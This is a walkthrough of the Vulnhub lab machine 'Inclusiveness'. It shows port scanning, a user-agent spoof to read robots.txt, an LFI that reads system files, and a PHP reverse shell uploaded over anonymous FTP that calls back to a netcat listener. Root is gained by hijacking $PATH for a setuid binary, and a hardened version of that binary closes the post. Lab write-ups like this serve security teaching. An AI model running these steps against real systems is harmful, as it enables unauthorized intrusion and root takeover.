[VLN] Inclusiveness

Today we are going to hack the Vulnhub machine called Inclusiveness. You can download it from the following link: Inclusiveness

Enumeration

We start with an nmap scan to see which ports are open.

sml@Cassandra:~$ nmap -A -p- 192.168.1.96
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-30 11:27 CEST
Nmap scan report for inclusiveness.home (192.168.1.96)
Host is up (0.00036s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0            4096 Feb 08 21:51 pub [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.148
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 06:1b:a3:92:83:a5:7a:15:bd:40:6e:0c:8d:98:27:7b (RSA)
|   256 cb:38:83:26:1a:9f:d3:5d:d3:fe:9b:a1:d3:bc:ab:2c (ECDSA)
|_  256 65:54:fc:2d:12:ac:e1:84:78:3e:00:23:fb:e4:c9:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.96 seconds
We can see that anonymous login is allowed on the FTP server and that there is only one folder, called "pub".

sml@Cassandra:~$ ftp 192.168.1.96
Connected to 192.168.1.96.
220 (vsFTPd 3.0.3)
Name (192.168.1.96:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Feb 08 21:51 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> 
Apache only serves the default page. When we try to look at /robots.txt we get the following message: You are not a search engine! You can't read my robots.txt! We use curl to spoof the user-agent so the server thinks we are a search engine:

sml@Cassandra:~$ curl --user-agent "Googlebot/2.1 (+http://www.google.com/bot.html)" -v $@ http://192.168.1.96/robots.txt
*   Trying 192.168.1.96:80...
* TCP_NODELAY set
* Connected to 192.168.1.96 (192.168.1.96) port 80 (#0)
> GET /robots.txt HTTP/1.1
> Host: 192.168.1.96
> User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 30 Mar 2020 09:27:26 GMT
< Server: Apache/2.4.38 (Debian)
< Last-Modified: Sat, 08 Feb 2020 03:26:11 GMT
< ETag: "2d-59e08115bb1ef"
< Accept-Ranges: bytes
< Content-Length: 45
< Content-Type: text/plain
< 
User-agent: *
Disallow: /secret_information/
* Connection #0 to host 192.168.1.96 left intact
It returns: Disallow: /secret_information/ At http://192.168.1.96/secret_information/ there is a page with some text and 2 links; clicking either of them appends ?lang=en or ?lang=es to the end of the URL, so we test whether the ?lang= parameter is vulnerable to LFI. We can use fi-cyberspace-scan[1].

sml@Cassandra:~/tools/fi-cyberspace-scan$ python fi-cyberscan.py -t http://192.168.1.96/secret_information/?lang= -m 3
-----------------------------------------------------------------
'___ *  .    '   \|/     *   .   '      + .----. .  '  -*-    
|===|     ' __   -*-  FI Cyberspace-Scan  ||'''|_       ' ___ 
|= =|__'  _|==|_ /|\  ___     * .   __   _||= =|.| *   __|===|
|= =|::| |.|:|==|____|= =| .   ____|==| |::|= =|.|__ '|::|= =|
|=|=|::|_|.|:|==| :: |_.-`-.__|----|==|_|::|=|=|.|::|_|::|= =|
-----------------------Hardwired Options-------------------------
TARGET URL                   : http://192.168.1.96/secret_information/?lang=
CYBER ATTACK MODE            : Kuang-Grade-Mark-11
PATH TYPE                    : ../
DEEP SPACE TRAVERSAL         : False
NULL-BYTE %00                : False
-----------------------------------------------------------------
DO NOT USE AGAINST UNAUTHORIZED INTRUSION COUNTERMEASURE ELECTRONICS
Execute Cyberspace Run? [Y/n]: 

-----------------------------------------------------------------
It seems  146  is the common reflected byte size.

Digging into unique reflection sizes.
-----------------------------------------------------------------

[+] - Something interesting found with proc/self/cmdline in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with proc/self/stat in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with etc/issue in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with etc/motd in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with etc/passwd in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with etc/group in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with etc/mysql/my.cnf in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with etc/vsftpd.conf in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with etc/fstab in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with proc/self/cmdline in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with proc/self/stat in 
     --Path:  /
     --Path:  ../../../../
[+] - Something interesting found with proc/self/status in 
     --Path:  /
     --Path:  ../../../../
-----------------------------------------------------------------
Cyber Run Status:      COMPLETE
-----------------------------------------------------------------
It is vulnerable to LFI and we can read the contents of several files. If we look at the contents of /etc/vsftpd.conf: http://192.168.1.96/secret_information/?lang=etc/vsftpd.conf we can see that it contains the line: anon_root=/var/ftp/ That means that when we upload something to the FTP server as the anonymous user (whose folder is pub), we are actually placing it in /var/ftp/pub. Knowing this, we can upload the typical php-reverse-shell and use the LFI to execute it.

Exploitation

sml@Cassandra:/usr/share/webshells/php$ cp php-reverse-shell.php /home/sml/webshell.php
sml@Cassandra:~$ nano webshell.php # Change the IP and port.
sml@Cassandra:~$ ftp 192.168.1.96
Connected to 192.168.1.96.
220 (vsFTPd 3.0.3)
Name (192.168.1.96:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd pub
250 Directory successfully changed.
ftp> put webshell.php
local: webshell.php remote: webshell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5495 bytes sent in 0.00 secs (201.5554 MB/s)
ftp>
Now that we have uploaded php-reverse-shell.php, we run the following in a terminal:

nc -nlvp 5555
And we visit http://192.168.1.96/secret_information/?lang=/var/ftp/pub/webshell.php We now have a shell :)

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.96] 43170
Linux inclusiveness 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux
 20:16:40 up 52 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

Privilege Escalation

In /home/tom we can see an executable called rootshell with the setuid bit set and owned by root (user and group); if we could get it to run its payload, we would obtain root privileges. We can see its source code in rootshell.c

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

int main() {

    printf("checking if you are tom...\n");
    // "whoami" is given without an absolute path, so popen() resolves it
    // through the caller's $PATH.
    FILE* f = popen("whoami", "r");

    char user[80];
    fgets(user, 80, f);

    printf("you are: %s\n", user);
    //printf("your euid is: %i\n", geteuid());

    // Only the first 3 characters are compared, so "tom\n" from fgets matches.
    if (strncmp(user, "tom", 3) == 0) {
        printf("access granted.\n");
        setuid(geteuid());
        execlp("sh", "sh", (char *) 0);
    }
    return 0;
}
Basically, it runs whoami and checks whether the output is "tom"; if it is, we get root privileges. We can see that the absolute path to whoami was not used, which lets us modify the $PATH variable and create a script called whoami that prints "tom" when run, so that running the program gives us a root shell.

$ cd /tmp
$ echo "echo tom" > whoami
$ chmod +x whoami
$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
$ export PATH=/tmp:$PATH
$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
$ cd /home/tom
$ ./rootshell
checking if you are tom...
you are: tom

access granted.
# id
uid=0(root) gid=33(www-data) groups=33(www-data)
# cd /root
# ls
flag.txt
# cat flag.txt

|\---------------\
||                |
|| UQ Cyber Squad |       
||                |
|\~~~~~~~~~~~~~~~\
|
|
|
|
o

flag{omg_you_did_it_YAY}
#
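For contrast, here is how rootshell.c could have verified the caller without trusting $PATH or the output of whoami: the real uid comes from the kernel and the expected uid from the password database, and the shell is started with an absolute path and a fixed environment. This is an added example, not the code from the VM; it assumes the allowed account is still named tom and that /bin/sh exists.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pwd.h>
#include <sys/types.h>

/* Added example (not the VM's rootshell.c): a check that a fake whoami on
 * $PATH cannot influence, because no external command is run at all. */

/* Returns 1 when real_uid is the uid of the account described by pw,
 * 0 when it is not or when the account does not exist (pw == NULL). */
int caller_is_account(uid_t real_uid, const struct passwd *pw) {
    if (pw == NULL) {
        return 0;
    }
    return pw->pw_uid == real_uid;
}

int main(void) {
    printf("checking if you are tom...\n");
    /* getpwnam() reads the account from /etc/passwd (or NSS), never $PATH;
     * getuid() is the caller's real uid, which setuid-root does not change. */
    if (!caller_is_account(getuid(), getpwnam("tom"))) {
        fprintf(stderr, "access denied.\n");
        return 1;
    }
    printf("access granted.\n");
    if (setuid(geteuid()) != 0) {   /* the call can fail; check it */
        perror("setuid");
        return 1;
    }
    /* Absolute path plus a fixed environment: nothing from the caller's
     * $PATH or other variables reaches the privileged shell. */
    char *const argv[] = { "sh", NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    execve("/bin/sh", argv, envp);
    perror("execve");
    return 1;
}
```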

End

And with that we are root on the machine :)

[1] https://github.com/rtcrowley/fi-cyberspace-scan